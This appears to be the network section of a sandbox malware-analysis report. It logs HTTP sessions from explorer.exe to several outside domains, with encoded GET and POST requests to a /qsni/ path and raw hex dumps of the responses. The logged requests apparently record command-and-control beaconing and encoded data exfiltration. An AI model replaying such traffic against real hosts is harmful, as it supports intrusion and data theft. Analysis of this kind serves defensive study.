                                                                                          Data Raw: 31 35 62 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 5d 6d 73 db 36 b6 fe dc ce ec 7f 40 95 49 1d 35 22 45 51 92 e3 c8 b1 77 93 36 9d ed dc f6 36 93 a6 b3 b3 b7 b7 a3 81 48 48 42 03 12 2c 00 59 72 15 ed 6f bf 03 80 14 41 0a 20 69 e7 e5 b6 f6 c4 b1 80 07 e7 1c 1c 1c 3c 00 01 10 7e f6 c5 37 3f 7e fd e6 df af 5e 82 7f be f9 e1 fb eb bf 7d fe 6c 2d 12 02 08 4c 57 57 3d 94 7a 3f ff d4 53 89 08 c6 d7 7f fb fc b3 67 09 12 10 44 6b c8 38 12 57 bd 9f df 7c eb 5d f4 54 86 c0 82 a0 eb 57 70 85 40 4a 05 58 d2 4d 1a 83 2f 1f 5c 84 a3 d1 25 78 b3 46 e0 1b 7c 83 53 04 5e 6f 62 06 df f2 35 7c 36 d4 45 3e d7 32 53 98 a0 ab 33 46 17 54 f0 33 10 d1 54 a0 54 5c 9d 25 70 e7 e1 04 ae 90 97 31 74 83 d1 76 46 20 5b a1 33 30 bc fe fc 19 c1 e9 5b c0 10 b9 3a 8b 53 2e 01 4b 24 a2 f5 19 58 33 b4 bc 3a 1b 0e c5 1a c5 4a 2b 2b 94 fa 11 4d ba 95 5d d2 54 70 7f 45 e9 8a 20 98 61 6e 29 d9 83 44 20 96 42 81 7a 40 dc 66 e8 aa 07 b3 8c e0 08 0a 4c d3 21 e3 fc f1 2e 21 3d a0 aa 79 d5 b3 f9 00 7c c9 e0 ef 1b 7a 09 be 45 28 ee 69 dd bd b5 10 19 9f b9 ac 1f 2e 11 8a 87 bd 8f 66 c9 d7 34 49 50 2a f8 5d 4c 8a f2 32 a6 6d 65 a3 f6 64 b3 65 94 89 de b1 59 7b 5b 1c 8b f5 55 8c 6e 70 84 3c f5 61 00 70 8a 05 86 c4 e3 11 24 e8 6a d4 ab 0a f9 e9 bf fe fd ea e5 fc cd 8f 3f 7e ff e2 f9 6b 43 52 25 7d fe ea f9 eb 9f 5e be 9e 7f fd e3 0f af 9e bf f9 ee c5 f7 2f 6b 52 c4 1a 25 c8 8b 28 a1 cc 90 f1 60 89 26 e7 93 52 63 c6 68 86 98 b8 bd ea d1 d5 4c 39 cd 00 df 21 c4 ed 02 37 8c 18 e2 a4 6b dd 9e fd 9d a7 78 68 17 43 a8 f4 93 21 09 a5 73 d9 5b 6d 58 8e 05 9a 4b 0f 18 f0 ee 06 cb 88 32 db 0e 2d a4 3c 89 e5 e2 96 20 80 e3 ab b3 2d a5 2a 0a 58 84 3c 9c 12 9c 1e ff 8b 38 3f bb fe dc 37 00 60 49 59 02 7c f9 d3 63 74 0b 7c 86 7e df 60 86 62 b0 07 37 98 e3 05 26 58 dc ce f4 ef 04 5d 82 c3 e7 cf 86 4a 55 a5 df aa 14 be 46 48 9c 29 13 36 dc 53 9d 56 69 cc fb 71 11 b8 b6 de 3c 8c 38 ff fb 12 26 98 dc 5e bd 24 8f 7f 40 9c 63 86 1f 8e 9f 4f 82 e0 e1 93 af 7f 66 0b 98 62 2e f2 84 f0 eb a9 fa 79 1e 04 5f 3e 08 c6 17 97 31 e6 19 81 b7 57 7c 0b 33 9d 72 83 d8 d5 b9 1f 9e 81 04 c5 18 5e 9d 41 42 ea 5c 63 b1 59 25 d5 6d 76 47 c4 36 f3 f2 96 18 aa 60 e6 c3 ef 92 8c a1 3f a0 ac 8e f6 92 9f e0 d4 97 95 93 06 5d f8 a3 c9 1d 2d 32 db f2 43 d8 45 93 84 a6 ca bc 8c 6c 56 38 e5 43 43 c3 5d 8c
                                                                                          Data Ascii: 15bb]ms6@I5"EQw66HHB,YroA i<~7?~^}l-LWW=z?SgDk8W|]TWp@JXM/\%xF|S^ob5|6E>2S3FT3TT\%p1tvF [30[:S.K$X3:J++M]TpE an)D Bz@fL!.!=y|zE(i.f4IP*]L2medeY{[Unp<ap$j?~kCR%}^/kR%(`&RchL9!7kxhC!s[mXK2-< -*X<8?7`IY|ct|~`b7&X]JUFH)6SViq<8&^$@cOfb.y_>1W|3r^AB\cY%mvG6`?]-2CElV8CC]
                                                                                          Mar 30, 2023 10:25:20.660528898 CEST216INData Raw: 3d f2 10 cc b0 bf f5 29 5b 0d 3b 32 d4 36 f3 7e e3 34 55 dc 64 c8 7b 19 63 f1 f3 eb ef ec a4 19 57 48 f3 f5 4f df 74 d4 b5 4b 08 cb 22 3f 5b 67 7f 67 3c ae 33 f5 96 6c 13 98 e2 25 e2 c2 a6 d6 c8 d6 ea 4b 95 8d b5 c3 69 44 36 31 e2 a6 00 5f 09 a8
                                                                                          Data Ascii: =)[;26~4Ud{cWHOtK"?[gg<3l%KiD61_AQQbspK*gxp&<_4fhO5M;+{A`bw/L3 x}xRxW{B}{T+h##K\7L#p
                                                                                          Mar 30, 2023 10:25:20.660564899 CEST218INData Raw: c0 48 fe 30 88 f2 04 e7 6d b2 59 00 bc 06 ac dc 30 3b 5a a1 f6 3b 67 a3 69 18 64 bb 4b cf c3 69 b6 11 7a ef ca 93 6b 95 b3 11 43 49 99 be ce 9f 82 cd b4 0c c6 2a de aa 48 ed df 5c 7c 45 b6 9a 29 28 57 cc 6e 20 7b 64 1b 43 a5 95 ca 84 05 8d 6f 67
                                                                                          Data Ascii: H0mY0;Z;gidKizkCI*H\|E)(Wn {dCogb70G/z4$ 0"V1iEL[.An|ta.~C6|.2<:d4ETEsGM&lxS]$d?!;]\&p-4(9CIO'ZOt
                                                                                          Mar 30, 2023 10:25:20.660599947 CEST219INData Raw: ec c6 2c f9 33 e4 91 5a 92 d8 49 2d 49 ec a6 16 59 cc 4e 2d 49 6c a5 96 24 76 53 8b 54 64 a7 96 24 76 53 4b 12 5b a9 25 89 dd d4 22 6d b3 53 4b 12 bb a9 25 89 ad d4 22 6b 64 a7 16 e9 1c 27 b5 c8 4c 27 b5 c8 4c 2b b5 24 71 1b b5 94 88 66 6a 29 71
                                                                                          Data Ascii: ,3ZI-IYN-Il$vSTd$vSK[%"mSK%"kd'L'L+$qfj)q-blB-qMRZPQ&j)a-RbxZjB-#rRYESYY"BVVj!+7HBVnj!++E:I-2I-2J-dF-%ZJ\Pa\
                                                                                          Mar 30, 2023 10:25:20.660634995 CEST220INData Raw: 7c e3 ef 1e bd f1 24 1c f7 e5 0c 51 1f 3e f6 25 23 3c 06 21 f8 0a 68 7a e8 1f ee 42 9c 26 15 d6 56 b1 2e 8b a7 44 c7 d3 df e1 ce 4d 27 a9 b9 aa f3 fa ab d3 cb 2d ca 07 cf bb 6b f8 30 2d 56 b0 e7 3d f4 ab 5b 37 1a f4 eb 5b 39 72 45 b3 5e ef f2 e4
                                                                                          Data Ascii: |$Q>%#<!hzB&V.DM'-k0-V=[7[9rE^[o!\iUp9jxP}}Z3/HLX2<-yz::OO=<Q7p]PnEUI%md;iGN6M]<lc[R2$=+Z;[k
                                                                                          Mar 30, 2023 10:25:20.672858953 CEST221INData Raw: 37 34 30 0d 0a ec 5d db 6e e3 38 0c fd 95 be 2c a6 01 ec 40 76 92 de 02 f4 3f f6 c9 70 5b 6f 13 6c 26 29 92 34 9d 45 d0 fd f6 85 6e 16 25 51 17 5f 52 ec a0 7a 99 69 5d 89 a4 65 eb 98 3a 12 49 5f aa 74 c1 a2 b0 1c e9 5a f2 2d 7a 40 fa b8 7b cb 90
                                                                                          Data Ascii: 740]n8,@v?p[ol&)4En%Q_Rzi]e:I_tZ-z@{k%=mo#?hMsj6UC)$}zv;EJ<wt>f@xfd13Kp`#f_6v-S:m}bh^18Emn87+Vq.
                                                                                          Mar 30, 2023 10:25:20.672895908 CEST222INData Raw: f1 46 89 37 4a bc 51 e2 8d 12 6f d4 ad 0e 0a a0 8d 42 05 a3 13 6d 94 68 a3 44 1b 25 da 28 d1 46 89 36 a2 b4 11 f1 d1 46 b3 00 6d 44 a2 68 a3 d9 ef 42 1b a1 e7 84 3a d3 46 f7 40 ca fd f7 26 8d 3c f5 11 80 cb 22 6a 1b 24 97 25 b9 2c c9 65 49 2e 4b
                                                                                          Data Ascii: F7JQoBmhD%(F6FmDhB:F@&<"j$%,eI.KrYsY[B.Kqe":,7@vXp;cec3RqXOtqL,_aQvVm7B,i{Y1}`N,_(To4WV_brS<l
                                                                                          Mar 30, 2023 10:25:20.716953993 CEST223INData Raw: 64 38 34 0d 0a ec 5d eb 72 db 36 16 fe 9d cc f4 1d ce a0 4d 93 4e 45 89 d4 c5 96 65 49 3b 9b a6 3b bb 9d a6 9b 89 d3 ed 8f 4e 47 03 51 90 48 9b 22 b8 00 25 47 4d fd 40 fb 1a fb 64 3b 07 00 49 90 a2 64 39 56 d2 b4 eb 3f 12 09 1c dc 0e ce 05 f8 00
                                                                                          Data Ascii: d84]r6MNEeI;;NGQH"%GM@d;Id9V?NW2K}fq'pYI-gL'OJNt.ujh'-I>yW+!P?.){gS2<<oWEfY7k{[2wf}EYQzTkYw[,)Oi{)q
                                                                                          Mar 30, 2023 10:25:20.717000008 CEST225INData Raw: ac d3 fe e0 0c eb b4 8f c4 30 19 f0 e4 16 47 c2 93 f7 e2 4a 79 b8 10 71 89 7e 5a 45 b6 56 51 cd d8 c0 c0 99 66 b8 49 80 c7 7e 14 fa 57 a3 a7 82 a5 2b 11 c3 bb 2f ff bd e2 e9 b9 1e 00 fc 84 63 5f 1d 30 38 73 dd 86 1d f7 9c 05 74 1d 72 61 a2 bd 9b
                                                                                          Data Ascii: 0GJyq~ZEVQfI~W+/c_08stra0OLq(7O)jhY`<1[dRVKMRlW)?hU5(&G7FXb6+(lK)W,n}G]UAOjfA
                                                                                          Mar 30, 2023 10:25:20.717022896 CEST225INData Raw: 4f 5e e8 cf ba 60 84 8a b8 83 58 fa 82 47 d1 0b 73 74 88 26 45 da 8c 3a a2 f1 a2 da 5a 3b ac da 56 2b ae b9 a4 8b 18 b7 d7 bc 52 c8 5c 4d ea 0a c5 c1 79 35 d3 57 82 ad 61 04 4f f1 3f e4 2b 09 cf be 67 f3 14 d4 ba 13 5c b1 cd 57 4f 0f c9 e5 07 84
                                                                                          Data Ascii: O^`XGst&E:Z;V+R\My5WaO?+g\WOGT?Sz,L`.O'>IyJ'O->t]eTmy*bb|P`X^s:NVcRL`~Gb+[,\0F$Mn9 E7CpRaU=
                                                                                          Mar 30, 2023 10:25:20.721302032 CEST226INData Raw: 32 33 66 0d 0a bd 5d 4b 6f e2 30 10 3e 17 69 ff 43 64 09 01 12 d8 49 43 1b 4a 05 3d ef 65 6f db 13 52 64 d9 43 9b 34 09 d4 49 48 ab 55 ff fb 6a c6 04 92 b2 d9 76 b5 a2 27 82 c7 f3 b0 67 26 0f 79 fc b9 5e e7 75 ec 26 3b e4 13 b1 dc 49 db ca 96 bd
                                                                                          Data Ascii: 23f]Ko0>iCdICJ=eoRdC4IHUjv'g&y^u&;Ia}39vc'7L ]qD*.1v8C(Ch8TSQRC.\%O`m\zAQ7'D<a Tn


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          27192.168.2.64973485.187.128.3480C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:25:22.472261906 CEST227OUTGET /qsni/?C6=S6oNdn2CISfbyQQSFOkbdML8TX/gNb7zOhc0ncpUr4ThSa27AwSs7NRYXuu6rvDZZ5M5qPLQzIJSvpL/eoGGUOPSfzmcqKmyyuwcLPwrUmgH&ZOm=dXna0d HTTP/1.1
                                                                                          Host: www.thedivinerudraksha.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Mar 30, 2023 10:25:23.154563904 CEST228INHTTP/1.1 301 Moved Permanently
                                                                                          Connection: close
                                                                                          x-powered-by: PHP/8.0.28
                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                          cache-control: no-cache, must-revalidate, max-age=0
                                                                                          content-type: text/html; charset=UTF-8
                                                                                          x-redirect-by: WordPress
                                                                                          location: http://thedivinerudraksha.com/qsni/?C6=S6oNdn2CISfbyQQSFOkbdML8TX/gNb7zOhc0ncpUr4ThSa27AwSs7NRYXuu6rvDZZ5M5qPLQzIJSvpL/eoGGUOPSfzmcqKmyyuwcLPwrUmgH&ZOm=dXna0d
                                                                                          content-length: 0
                                                                                          date: Thu, 30 Mar 2023 08:25:23 GMT
                                                                                          server: LiteSpeed
                                                                                          strict-transport-security: max-age=63072000; includeSubDomains
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-content-type-options: nosniff


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          28192.168.2.64973581.169.145.7280C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:25:33.816648006 CEST229OUTPOST /qsni/ HTTP/1.1
                                                                                          Host: www.wellblech.shop
                                                                                          Connection: close
                                                                                          Content-Length: 188
                                                                                          Cache-Control: no-cache
                                                                                          Origin: http://www.wellblech.shop
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://www.wellblech.shop/qsni/
                                                                                          Accept-Language: en-US
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 43 36 3d 38 50 65 34 6e 70 73 52 59 6b 30 53 55 62 59 55 6e 57 6f 57 41 6d 6a 57 62 2d 69 5a 44 38 74 64 39 32 76 31 62 48 41 37 31 56 48 69 57 7a 54 6a 61 74 32 39 6e 35 43 58 77 70 56 78 35 37 43 4e 7a 39 53 46 42 73 7a 63 65 49 76 2d 42 2d 38 6b 36 57 4c 4d 6a 63 6b 31 72 53 73 46 6a 47 6e 65 50 76 7e 42 71 77 49 53 4f 30 73 56 43 62 57 33 6d 4a 61 53 37 48 49 6d 77 41 4c 7a 6b 7a 37 64 35 45 6f 59 52 71 45 42 28 51 64 79 31 39 42 49 66 58 4a 34 45 56 48 54 39 2d 41 72 78 67 7a 30 65 47 6a 4c 6e 32 53 78 38 48 28 78 61 38 50 7a 36 75 56 6c 38 64 6f 2e 00 00 00 00 00 00 00 00
                                                                                          Data Ascii: C6=8Pe4npsRYk0SUbYUnWoWAmjWb-iZD8td92v1bHA71VHiWzTjat29n5CXwpVx57CNz9SFBszceIv-B-8k6WLMjck1rSsFjGnePv~BqwISO0sVCbW3mJaS7HImwALzkz7d5EoYRqEB(Qdy19BIfXJ4EVHT9-Arxgz0eGjLn2Sx8H(xa8Pz6uVl8do.
                                                                                          Mar 30, 2023 10:25:33.837944031 CEST229INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 30 Mar 2023 08:25:33 GMT
                                                                                          Server: Apache/2.4.56 (Unix)
                                                                                          Content-Length: 196
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          29192.168.2.64973681.169.145.7280C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:25:37.802457094 CEST231OUTPOST /qsni/ HTTP/1.1
                                                                                          Host: www.wellblech.shop
                                                                                          Connection: close
                                                                                          Content-Length: 1452
                                                                                          Cache-Control: no-cache
                                                                                          Origin: http://www.wellblech.shop
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://www.wellblech.shop/qsni/
                                                                                          Accept-Language: en-US
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 43 36 3d 38 50 65 34 6e 70 73 52 59 6b 30 53 58 37 6f 55 72 56 77 57 42 47 6a 4a 48 4f 69 5a 4a 63 74 5a 39 32 7a 31 62 46 74 2d 32 6e 72 69 57 6a 6a 6a 61 50 75 39 30 70 43 58 32 70 55 35 30 62 43 68 7a 39 47 4a 42 75 71 68 65 4f 50 2d 42 5a 67 6b 74 46 6a 44 72 4d 6b 7a 38 79 73 45 6a 47 6e 78 50 76 4f 64 71 7a 6c 48 4f 30 6b 56 44 70 7e 33 78 70 61 52 33 6e 49 6d 77 41 4c 33 6b 7a 36 2d 35 45 41 41 52 6f 6c 4b 28 69 31 79 32 63 68 49 65 30 68 37 4d 31 48 58 33 65 42 39 78 56 57 4b 55 32 75 6b 78 48 61 79 6f 79 4f 61 5a 50 7e 42 7e 4f 35 7a 6f 4b 53 33 47 48 72 45 51 44 61 45 63 36 41 6a 42 78 51 69 4a 67 48 59 42 30 36 4f 4d 63 58 73 7a 44 50 2d 51 37 4e 45 6c 46 6e 65 54 59 4f 4c 58 34 41 63 79 6b 70 45 47 30 28 4b 51 7a 65 68 63 42 64 4f 78 6c 55 4a 53 78 64 68 6d 54 4e 59 61 33 79 5a 50 59 6d 71 63 34 6a 53 66 63 70 49 70 39 65 6c 61 74 72 75 28 41 46 55 4f 4a 70 79 61 7a 45 4f 4e 51 4c 74 37 34 71 61 34 71 6d 63 4c 65 5a 50 35 78 43 75 51 72 4a 57 71 71 7a 42 59 63 56 37 58 34 48 46 39 56 59 51 6b 4b 4a 48 50 50 34 4e 4d 46 63 38 42 5f 65 6a 37 66 4f 69 6e 4d 73 55 50 48 70 76 76 31 77 6c 66 6e 53 73 55 4b 62 47 46 33 7a 65 46 44 33 73 65 56 70 33 53 78 43 4f 71 74 72 62 35 61 4a 48 52 6d 4e 46 6a 74 72 53 4e 6f 45 7a 39 78 41 59 71 51 62 65 52 7a 70 57 6f 50 57 58 79 76 72 53 70 56 51 51 32 76 72 73 6c 6b 30 44 4a 4f 78 54 48 38 51 6c 4b 48 77 70 44 54 59 4a 6e 4e 4c 41 38 4a 64 64 44 43 57 35 61 62 33 43 50 76 4f 2d 36 4d 75 56 67 6c 69 57 67 49 57 5f 72 57 76 32 6b 73 30 6e 37 62 63 68 49 61 30 34 5a 6d 37 55 70 55 73 58 78 74 73 58 7e 47 72 70 50 65 4f 4e 76 56 79 78 71 4f 52 67 34 70 69 4f 31 54 6a 6c 49 62 67 49 59 65 4c 7a 51 74 76 2d 51 59 52 31 48 64 39 67 36 6f 67 61 28 69 6b 39 78 58 53 6f 4d 54 77 55 44 67 31 37 53 68 39 44 36 39 68 58 52 35 4a 65 67 6a 37 77 54 37 65 39 58 4a 78 6a 30 62 43 6e 51 55 69 64 39 41 61 35 6a 53 4c 2d 39 30 51 46 31 6b 6d 36 50 69 57 71 76 49 35 50 61 71 52 51 4f 37 55 2d 4c 72 62 41 71 66 35 53 41 38 31 6e 42 70 56 4c 67 36 53 39 51 50 44 58 49 70 6c 41 30 6e 49 68 4e 6c 79 33 30 6f 47 38 38 5f 59 52 62 4e 76 35 4c 30 63 39 41 38 42 36 7e 58 56 57 57 63 51 54 49 42 58 65 43 59 33 4b 7a 48 67 6b 74 43 4b 47 4e 6b 52 77 73 5f 4a 4d 72 57 4c 5f 6b 70 51 69 6d 66 7e 69 33 52 4c 46 35 46 69 37 33 57 6d 6f 66 31 5a 72 77 6a 36 45 34 44 74 2d 64 42 64 63 45 63 6a 4a 71 78 4c 64 74 66 79 6c 55 6f 74 4b 7e 37 6c 4f 31 58 73 4f 6f 59 38 5f 7e 51 52 45 28 37 57 43 42 39 63 77 74 79 71 39 4c 75 59 4e 6c 41 67 67 67 51 30 72 4b 73 6b 30 6b 4c 4d 59 76 6f 4a 72 47 70 38 37 78 36 77 6d 63 67 55 51 73 5f 6d 6f 38 42 52 44 6f 73 77 61 7a 4c 42 53 78 32 6e 4a 59 77 44 37 69 37 61 39 72 6f 35 6b 28 35 4b 6e 4e 31 32 38 51 5f 38 38 43 6b 6d 52 76 30 41 33 34 61 4d 38 49 6b 7e 38 75 75 4e 46 42 68 49 6a 61 6f 4e 59 5a 57 58 4a 55 38 6b 4f 33 61 70 53 78 61 4c 5a 64 75 47 75 61 34 51 52 61 38 70 32 48 5a 75 6d 55 71 47 6b 6a 48 58 70 41 54 6b 2d 52 69 36 57 49 57 39 64 28 4f 71 44 30 37 74 59 7e 43 77 56 38 76 62 37 79 5a 67 6e 61 38 53 72 37 57 76 7a 56 32 64 51 45 6a 6b 31 45 73 39 62 52 2d 56 6a 76 6a 43 4e 5a 59 71 6c 35 73 30 4f 6c 72 4e 53 4a 6b 43 55 39 73 45 59 59 65 42 49 59 76 64 42 70 49 37 38 4f 6f 6a 65 7a 55 67 52 62 42 7e 57 73 39 65 4e 6d 76 74 36 35 4a 55 55 52 73 6c 75 36 6a 4b 4a 4a 78 58 32 34 4e 6f 38 43 45 77 52 6c 46 7e 35 4c 4d 35 53 37 61 32 42 46 4f 73 61 43 4d 4b 55 4b 47 34 31 56 46 33 36 5a 35 33 38 6b 72 4d 46 34 52 53 53 34 35 4f 31 45 4f 56 45 69 46 53 62 57 48 6f 58 4d 32 72 49 6a 43 30 77 73 31 71 7a 37 4c 45 4d 68 70 78 4c 57 48 61 63 38 51 42 6c 45 4c 28 54 74 4f 6b 61 35 4b 38 34 5a 58 33 45 70 4a 34 43 6f 45 43 4a 62 55 6d 4a 63 7a 4b 78 6f 53 63 59 38 62 49 44 77 64 37 68 41 47 39 45 39 76 5a 51 55 4b 57 73 70 73 4d 6f 42 67 74 64 59 65 73 76 39 58 4e 63 61 73 66 37 32 6a 32 4c 39 5a 4b 41 62 6c 71 37 68 44 28 63 55 52 56 73 6f 36 32 59 42 62 50 6c 41 67 35 57 49 65 44 56 4f 35 32 38 44 48 45 33 52 4d 61 54 41 7a 62 65 46 4d 6d 4b 49 39 76 49 7e 42 5a 74 7a 4f 67 49 54 33 51 57 6f 4a 76 6b 28 51 4a 37 78 41 73 4b 39 7a 7e 48 71 78 4b 58 6f 72 6a 6a
                                                                                          Data Ascii: C6=8Pe4npsRYk0SX7oUrVwWBGjJHOiZJctZ92z1bFt-2nriWjjjaPu90pCX2pU50bChz9GJBuqheOP-BZgktFjDrMkz8ysEjGnxPvOdqzlHO0kVDp~3xpaR3nImwAL3kz6-5EAARolK(i1y2chIe0h7M1HX3eB9xVWKU2ukxHayoyOaZP~B~O5zoKS3GHrEQDaEc6AjBxQiJgHYB06OMcXszDP-Q7NElFneTYOLX4AcykpEG0(KQzehcBdOxlUJSxdhmTNYa3yZPYmqc4jSfcpIp9elatru(AFUOJpyazEONQLt74qa4qmcLeZP5xCuQrJWqqzBYcV7X4HF9VYQkKJHPP4NMFc8B_ej7fOinMsUPHpvv1wlfnSsUKbGF3zeFD3seVp3SxCOqtrb5aJHRmNFjtrSNoEz9xAYqQbeRzpWoPWXyvrSpVQQ2vrslk0DJOxTH8QlKHwpDTYJnNLA8JddDCW5ab3CPvO-6MuVgliWgIW_rWv2ks0n7bchIa04Zm7UpUsXxtsX~GrpPeONvVyxqORg4piO1TjlIbgIYeLzQtv-QYR1Hd9g6oga(ik9xXSoMTwUDg17Sh9D69hXR5Jegj7wT7e9XJxj0bCnQUid9Aa5jSL-90QF1km6PiWqvI5PaqRQO7U-LrbAqf5SA81nBpVLg6S9QPDXIplA0nIhNly30oG88_YRbNv5L0c9A8B6~XVWWcQTIBXeCY3KzHgktCKGNkRws_JMrWL_kpQimf~i3RLF5Fi73Wmof1Zrwj6E4Dt-dBdcEcjJqxLdtfylUotK~7lO1XsOoY8_~QRE(7WCB9cwtyq9LuYNlAgggQ0rKsk0kLMYvoJrGp87x6wmcgUQs_mo8BRDoswazLBSx2nJYwD7i7a9ro5k(5KnN128Q_88CkmRv0A34aM8Ik~8uuNFBhIjaoNYZWXJU8kO3apSxaLZduGua4QRa8p2HZumUqGkjHXpATk-Ri6WIW9d(OqD07tY~CwV8vb7yZgna8Sr7WvzV2dQEjk1Es9bR-VjvjCNZYql5s0OlrNSJkCU9sEYYeBIYvdBpI78OojezUgRbB~Ws9eNmvt65JUURslu6jKJJxX24No8CEwRlF~5LM5S7a2BFOsaCMKUKG41VF36Z538krMF4RSS45O1EOVEiFSbWHoXM2rIjC0ws1qz7LEMhpxLWHac8QBlEL(TtOka5K84ZX3EpJ4CoECJbUmJczKxoScY8bIDwd7hAG9E9vZQUKWspsMoBgtdYesv9XNcasf72j2L9ZKAblq7hD(cURVso62YBbPlAg5WIeDVO528DHE3RMaTAzbeFMmKI9vI~BZtzOgIT3QWoJvk(QJ7xAsK9z~HqxKXorjj3R(GtnnUareV371pYcZXdK~gjIBPHe0ncb4tQUbayieAaunBx8msI8a8oBe6c773cMkYLAnzqPeet9fCacar2Cc.
                                                                                          Mar 30, 2023 10:25:37.825764894 CEST232INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 30 Mar 2023 08:25:37 GMT
                                                                                          Server: Apache/2.4.56 (Unix)
                                                                                          Content-Length: 196
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          3192.168.2.649710145.239.252.4980C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:23:54.354365110 CEST107OUTGET /qsni/?C6=sjDLJDaVFikbBLWeMZWSwu5CnHyJDqPqbcjbdnlFjtv6c2l5GqNUNqEWLibW6hm2WPlpLlzvFm1TmHWnlQdAoValOlOqTFFHZz0t1yDYUjQx&ZOm=dXna0d HTTP/1.1
                                                                                          Host: www.deconsurveys.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Mar 30, 2023 10:23:54.385090113 CEST107INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 30 Mar 2023 08:23:54 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 315
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
